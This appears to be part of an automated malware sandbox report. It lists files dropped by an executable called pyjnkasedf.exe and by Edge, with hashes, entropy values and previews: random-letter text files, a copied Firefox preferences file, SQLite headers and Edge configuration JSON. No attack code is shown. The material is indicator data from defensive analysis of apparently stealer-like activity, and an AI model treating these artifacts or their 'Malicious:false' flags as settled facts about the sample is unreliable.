                                                                                                                                                                                                                                                      Preview:EEGWXUHVUGUAGDCAESAKQJADEXSKGQOTKSMYVIQMWCXKMREFNGUJHWRPPFJWEQHLMDSTAHLHBQSXLRGVYEPBLZILRXLTPZSELULGEDFWQHJHNIHNCTGEIAAPQHNOFANJGPRIYVQSOFCGDPFBTNYILXIPYTWVOYXFUCEEQWZRPXFERZCPKKZAHOYWHFAYDMSXERUPTEZISMPADRFDIWGTWAXETEOPJYWDNGCDFFZUXZZSPZVIILCQXOFDOGUOSZYPXXVLSNAWWPHQGNSYQXOUOGPFDMDNPFUONUSGUOUKYHHGHFFZYEDSZVDRUEJKGSHEMJARIAEZZDBZJFCMNUJIHQFHGDONGFEZRYCZYIAOXAXGWENMTPOKNMZPJSZVCDZRZPFIIYHXITKZBLAJXANTSBCWIGABZKBTKDJRSTSKYORPMNGHCZWCLOVFPZBMYKBYDRXMFUQJDNWZFCVEOXPGJMBQZRUEOTLHEFHKDZLVFBXLUSXRAXKVLWGOWARAQZHIMTYBWKPLWNJFMLQVXGRMIGEIPZEIFBYZRYNEEZHFMFOGMBEWLJPBXWVYHVEUKSKVKINVMDJKCSAOUXTMIHLOJXLTEKLKJDYABXRPKNGFOXISIFXHABTYQIPUCFNIJWNCTAFGYEIBCCNXPZQAGPHNNRICKSKCXWERLWTFSJWUSCBTVWSYUVWXJQHMSZYHAHYELYFPIBFZETDRPQBQHKMCXRRCAEYFIERXQZVCDZZBPQJJDQUDHKPMDBXPEBPFURYAPUWVWVJRWXHFXQGMVUGOILYXGFSMEFMKLBFACOSIKHHXRBRGYVIVAOTFNIIOQUZTHBZGOGPVUVYSYNHRKOADWYTLCNTHHCZYXXGFCXMFHZBZBCCMTYSROXNAHKABYAXPWRNKHCJYLAMQAUZBVJWHFXISFSKFXGFPDIOTITGPUETUYHRIXQOTIGEVDQWEBJVPDIUZVQFUBWREJIPSNXDGEKXKULZFHZQHQXPMBIYA
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\pyjnkasedf.exe
                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (1808), with CRLF line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):10489
                                                                                                                                                                                                                                                      Entropy (8bit):5.49400008804932
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:192:HnBRNC3YbBp6lR1+PaX56/x8lSz9/3/OHNBw8DXSl:Oee1M/xbUPwO0
                                                                                                                                                                                                                                                      MD5:C285AF56A69C639A033B77359FEDE8A7
                                                                                                                                                                                                                                                      SHA1:676A4F90E2ED82CB9ABEE7DAFC3A25D984B380EE
                                                                                                                                                                                                                                                      SHA-256:ECF63A7733385EB825D49B5B351C0687E383F309D6849BE1C7AC06A1CD4E94B2
                                                                                                                                                                                                                                                      SHA-512:53ABAF224CE47D77A6883AFCE25089C12D8362B4BCC01D94F94DF846C9F24AAFB2004502B7E3D5DC512E764B1EFB0B0E1FFC39FA5A423F82EA4E61B83E4E292E
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "ecedec8f-7097-47fc-a9e3-d74f0c8e2503");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696499493);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696499494);..user_pref("app.update.lastUpdateTime.xpi-signature-verification
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\pyjnkasedf.exe
                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):106496
                                                                                                                                                                                                                                                      Entropy (8bit):1.1368932887859682
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cF/k4:MnlyfnGtxnfVuSVumEHFs4
                                                                                                                                                                                                                                                      MD5:9A534FD57BED1D3E9815232E05CCF696
                                                                                                                                                                                                                                                      SHA1:916474D7D073A4EB52A2EF8F7D9EF9549C0808A1
                                                                                                                                                                                                                                                      SHA-256:7BB87D8BC8D49EECAB122B7F5BCD9E77F77B36C6DB173CB41E83A2CCA3AC391B
                                                                                                                                                                                                                                                      SHA-512:ADE77FBBDE6882EF458A43F301AD84B12B42D82E222FC647A78E5709554754714DB886523A639C78D05BC221D608F0F99266D89165E78F76B21083002BE8AEFF
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\pyjnkasedf.exe
                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):98304
                                                                                                                                                                                                                                                      Entropy (8bit):0.08235737944063153
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                                                                                                                                                      MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                                                                                                                                                      SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                                                                                                                                                      SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                                                                                                                                                      SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\pyjnkasedf.exe
                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):51200
                                                                                                                                                                                                                                                      Entropy (8bit):0.8746135976761988
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                                                                                                                                                                                                      MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                                                                                                                                                                                                      SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                                                                                                                                                                                                      SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                                                                                                                                                                                                      SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\pyjnkasedf.exe
                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1026
                                                                                                                                                                                                                                                      Entropy (8bit):4.690299109915258
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:0C2jKPS/GeHBPaNDdBKW/PXAx+sTTqBVw8tk7LI/csnfv:UWKPaNjKW/PwxfTixkY/cSfv
                                                                                                                                                                                                                                                      MD5:F0D9DE697149ECBC1D88C7EA4841E5BD
                                                                                                                                                                                                                                                      SHA1:06A2A47C12B3554397AA0C8F483411CAB366947D
                                                                                                                                                                                                                                                      SHA-256:5BE0708B77E41FC490ECEC9CDFF20C9479FC857E47CC276D6F68C0895EA68FB2
                                                                                                                                                                                                                                                      SHA-512:E9953E00241C3FB48E267F1A49E2C53FEE4240415C7A48FAD089742C6C4AA1C5A9CCFEE616FC91EB29C1C8252A3095163A515ABA96A1F0B41A8B129929696917
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:EEGWXUHVUGUAGDCAESAKQJADEXSKGQOTKSMYVIQMWCXKMREFNGUJHWRPPFJWEQHLMDSTAHLHBQSXLRGVYEPBLZILRXLTPZSELULGEDFWQHJHNIHNCTGEIAAPQHNOFANJGPRIYVQSOFCGDPFBTNYILXIPYTWVOYXFUCEEQWZRPXFERZCPKKZAHOYWHFAYDMSXERUPTEZISMPADRFDIWGTWAXETEOPJYWDNGCDFFZUXZZSPZVIILCQXOFDOGUOSZYPXXVLSNAWWPHQGNSYQXOUOGPFDMDNPFUONUSGUOUKYHHGHFFZYEDSZVDRUEJKGSHEMJARIAEZZDBZJFCMNUJIHQFHGDONGFEZRYCZYIAOXAXGWENMTPOKNMZPJSZVCDZRZPFIIYHXITKZBLAJXANTSBCWIGABZKBTKDJRSTSKYORPMNGHCZWCLOVFPZBMYKBYDRXMFUQJDNWZFCVEOXPGJMBQZRUEOTLHEFHKDZLVFBXLUSXRAXKVLWGOWARAQZHIMTYBWKPLWNJFMLQVXGRMIGEIPZEIFBYZRYNEEZHFMFOGMBEWLJPBXWVYHVEUKSKVKINVMDJKCSAOUXTMIHLOJXLTEKLKJDYABXRPKNGFOXISIFXHABTYQIPUCFNIJWNCTAFGYEIBCCNXPZQAGPHNNRICKSKCXWERLWTFSJWUSCBTVWSYUVWXJQHMSZYHAHYELYFPIBFZETDRPQBQHKMCXRRCAEYFIERXQZVCDZZBPQJJDQUDHKPMDBXPEBPFURYAPUWVWVJRWXHFXQGMVUGOILYXGFSMEFMKLBFACOSIKHHXRBRGYVIVAOTFNIIOQUZTHBZGOGPVUVYSYNHRKOADWYTLCNTHHCZYXXGFCXMFHZBZBCCMTYSROXNAHKABYAXPWRNKHCJYLAMQAUZBVJWHFXISFSKFXGFPDIOTITGPUETUYHRIXQOTIGEVDQWEBJVPDIUZVQFUBWREJIPSNXDGEKXKULZFHZQHQXPMBIYA
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\pyjnkasedf.exe
                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1026
                                                                                                                                                                                                                                                      Entropy (8bit):4.69422273140364
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:hdGRma8y0UOkmVb01yh9qfT+PsSMxto3vIcMhrzxYWSDHtj:hdGRma6bRh9rsFE/uhrOWSDHh
                                                                                                                                                                                                                                                      MD5:A686C2E2230002C3810CB3638589BF01
                                                                                                                                                                                                                                                      SHA1:4B764DD14070E52A2AC0458F401CDD5724E714FB
                                                                                                                                                                                                                                                      SHA-256:38F526D338AC47F7C2CAB7AB654A375C87E51CC56B4FA09A7C5769E2FB472FFC
                                                                                                                                                                                                                                                      SHA-512:1F2AA9D4B55B52C32EF0C88189256562B16DF13EEA0564BD7B47E45CC39279F39823033ADF95BBD9A50B4F35E417E418C4D20BBE14EF425EFF7134ECE05BEB3F
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:SUAVTZKNFLPDUIKIPSQJDVGAPGXKDOHYHNOWHLTUYHUBPZNAGHXWSRGELNTTLWSOVKHBKQEKGENMQDFUYQEFPUMFVGFHNHBEYAAJVHSIYLSLGVZSSKYNEFOJGJXPWCGXOBRZVXDWDDKKLDGWVLNCMOJKBSBYFMTKILZOONEGLZWORUNOTXJNOTGXQTUBOXEFHVICNNYYHMRGCLTZLWQODATYJZBGFVEMSABDUIKNKVRGQOHHCSHZAJIYWZLGGZOOEOQBTEAFTXBQJIHRZBDRPFDGHVFGYZEIHFYVBPAXJYSLOTRVHEFEEWXUGJCOLFXEKSPFHBKQEHGPZADNNCAUYCTEDLFKZMZOQOADUCTDIOYKELVKGABHEMOSAYPWUUKTZHQNEQWLFATTPCULHLMBMEQVAXDFQNQLMLVOFTUTWLMJNLVNCRHTWUTJEEORGWISXALHDTNXRCWVMZRUEMSVOJYMENRHGVXXMGLOWYRFKZLPBZQMETPESMZPCJGYXVQSMCJXYEMMNKLPIXGOXOMQNYCFAEVPXDGOFEGSLWKBUOLRKXGTWDFUVGYFTOWQZAOIMQUZEELMCQWKUBEWGFDVXSXNGHPJNVDQHMPSSIFZTQLVBBHZOEGNPDAWAYLIRBWZHXRAXBBESYNRIRINAKLQMELNYRHRPKDBUCNSZOVHNTBCUYDQTGFWZJUCUZBHHXHQHKWOWTEWLUGGGWHIHCWZLLJPDFVDICZBBLFSECTLMQBKCPCHANOICKIUSVAJTYQOIUWRGVAFOFTMIHARUUCNGBLVFIKMTTGPYXNEVGLPMZDMIQDQOLIEFHNZYMZTCDOHBNQLNVLXRUXMGYCVOJDBWPSJKMFMEDBEMXULQBRVRKPYNUACCXNPGFEMPXDXNEIPTKGSKUMVFSLCTJFHNFATCDKSZWKYMVQNTVHCOAJXDUTJZESFLKTQOGREXBTBVBGLDYJYDTNEAQDFRTXMJIHJCCTPUDZLNKNEABFQYCDL
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):45965
                                                                                                                                                                                                                                                      Entropy (8bit):6.0882422219005505
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:768:QEMkbJrT8IeQc5dK1uUXqgfb/t1qP20jYEFRIQmxg7CvoqQYqGwLWZkHUfG67R:5Mk1rT8H1KTEFIQ3aooqfyW0e6l
                                                                                                                                                                                                                                                      MD5:35F2217636E9ADE4B2D662E0432E8EC7
                                                                                                                                                                                                                                                      SHA1:53A34C7B60A53B3226A509B532F5C57E162F743C
                                                                                                                                                                                                                                                      SHA-256:DD89E899CE20FDC49151CEC23C40456C5BD8A6F859E6885B437A821355317F96
                                                                                                                                                                                                                                                      SHA-512:E6CEAAB5EAB08C9BD14819237E32AC462AAD8CEC8EA0F35FC8C41A9B9BFF73A2D07C6CE4EC08F5B4D743D90BB305DF8A78A617F442863A270373EC9F880BC867
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"continuous_migration":{"local_guid":"60062091-de2a-46b7-9137-88525ea4fa75"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1733002719"},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMs
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):44445
                                                                                                                                                                                                                                                      Entropy (8bit):6.096468819298406
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4k9VUXqgfb/rV0sOPFYYFt7UQYqGwLWZkHUfG6kCvoZ:z/Ps+wsI7ynqK6qfyW0e6kaoZ
                                                                                                                                                                                                                                                      MD5:2BCE7E474014FF504172C29D04CFFBB3
                                                                                                                                                                                                                                                      SHA1:08F9973894A72AE933516EFD0E9282821CF62D43
                                                                                                                                                                                                                                                      SHA-256:D45FCEA35EC385CD3F8D6F277DC80AD58C33560175E63B9FE8595333563E3185
                                                                                                                                                                                                                                                      SHA-512:BFEAC9EA5E2E229EDE811CFF6D8F2E0AE2A7571CD12603E2A14734ACBC362D9B5C76BD8972BC884FBFFA8D0EFE102D0C31966990F9E1AA5BB45ACFCCBD89C076
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):43978
                                                                                                                                                                                                                                                      Entropy (8bit):6.091536102124481
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kgzUXqgfb/ZtXLz40PhIUpQYqGwLWZkHUfG6kCvoZ:z/Ps+wsI7ynVNt3FqfyW0e6kaoZ
                                                                                                                                                                                                                                                      MD5:88170FA30C2F622870C6EC4DAA34B0D7
                                                                                                                                                                                                                                                      SHA1:5740B63F2098275BEF4FF7691C4000B4074EB4CE
                                                                                                                                                                                                                                                      SHA-256:3B4971807EFDA48369A920BF16B2FD811F185A753D011FF44C776C81239EA28A
                                                                                                                                                                                                                                                      SHA-512:28DFA4567A43BC8C56C286560F97489FA508CC87D9480B456C7D79F258608FA626114E6F4FCF5638A1640B3B6CAEFFA0A83079AC499C6313B531DC2D33CA50A2
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):45918
                                                                                                                                                                                                                                                      Entropy (8bit):6.088541130293761
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:768:QEMkbJrT8IeQc5dKRuUXqgfb/t1qP20jYEFRIQmxg7CvoqQYqGwLWZkHUfG67R:5Mk1rT8H1KPEFIQ3aooqfyW0e6l
                                                                                                                                                                                                                                                      MD5:67C512EEDC0F1B0E96FE8D046BED73A4
                                                                                                                                                                                                                                                      SHA1:52C53FBF6079F5F43DDF479AA639E08EDDBC1303
                                                                                                                                                                                                                                                      SHA-256:71D15D88210F5158AF165D50095B639641CCFDE0A68422DCE38CDC2D9672755F
                                                                                                                                                                                                                                                      SHA-512:BA854750FA8E4CD0195182B6DD7D9ACCE95F2B86ADE331D37EDDC65048ABC2690AF306A563A0A30C00EE081C6359EFCE654C096FEFBABED846D8D537E558275B
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"continuous_migration":{"local_guid":"60062091-de2a-46b7-9137-88525ea4fa75"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1733002719"},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMs
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):46042
                                                                                                                                                                                                                                                      Entropy (8bit):6.0881640091586835
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:768:QEMkbJrT8IeQc5VK1uUXqgfb/G1qP20jYEFRIQmxg7CvoqQYqGwLWZkHUfG67R:5Mk1rT8HdKThFIQ3aooqfyW0e6l
                                                                                                                                                                                                                                                      MD5:BE64651653169BCC45D8690410A44AA8
                                                                                                                                                                                                                                                      SHA1:14ED0406DA2ECA5DEAFA6907F941ED6916BE5E94
                                                                                                                                                                                                                                                      SHA-256:1FCA058B6C6B25363FC2EBDDBA3D426264DCCC264B0321CCB888CF21E1A1971C
                                                                                                                                                                                                                                                      SHA-512:C4B0D6A044A5E874DAA2FCCA0E2B7BFAB062E3AF5BADC894E450100179B3D51A27B384CEFBD29A79888DAD4744363E0CBB2F146F05CBEFCCFA883D0E24027BFC
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"continuous_migration":{"local_guid":"60062091-de2a-46b7-9137-88525ea4fa75"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1733002719"},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMs
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):107893
                                                                                                                                                                                                                                                      Entropy (8bit):4.6401415786958475
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:1536:B/lv4EsQMNeQ9s5VwB34PsiaR+tjvYArQdW+Iuh57P7L:fwUQC5VwBIiElEd2K57P7L
                                                                                                                                                                                                                                                      MD5:8574D972959B295FEA388493B825FDF1
                                                                                                                                                                                                                                                      SHA1:388510DBD841625F1DFFC1347A4C41B8AF07B23C
                                                                                                                                                                                                                                                      SHA-256:8520149C20006B78EBBDCD489C459D56B922C235102433F8D4C5A440ABA6E776
                                                                                                                                                                                                                                                      SHA-512:E50D2B5D7ED6A634865875A570CA441CD6C3AA68ED181C4329E2BDE3AA06929DA02E4D1900691C88B3D7A501AB5223140969CCDE4C2B670F0937A2A75DFA763D
                                                                                                                                                                                                                                                      Malicious:false
